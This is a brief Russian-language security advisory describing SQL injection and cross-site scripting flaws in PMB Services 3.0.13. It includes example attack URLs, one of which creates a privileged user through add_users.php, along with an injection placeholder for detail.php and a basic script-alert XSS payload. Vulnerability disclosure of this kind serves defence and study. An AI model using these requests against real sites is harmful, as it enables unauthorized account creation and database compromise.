Хакер #305. Многошаговые SQL-инъекции
Программа: PMB Services 3.0.13
Найденные уязвимости позволяют удаленному пользователю осуществить XSS нападение на целевую систему и выполнить SQL код в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в параметре «user_loginname» сценарием add_users.php и в параметре «id» сценарием detail.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://vulnerable_server/path/scripts/add_users.php?user_loginname= HACK_USER&user_password=HACK_USER&user_real_name=real &user_email=os@so.net&user_permissions=3&user_added_by=1&user_lastmod_by=1&user_allow=1
http://vulnerable_server/path/detail.php?id=1;[SQL INJECTION]
2) Уязвимость существует из-за недостаточной обработки входных данных сценариями addblog_comment.php и detail.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
<script>alert("XSS")</script>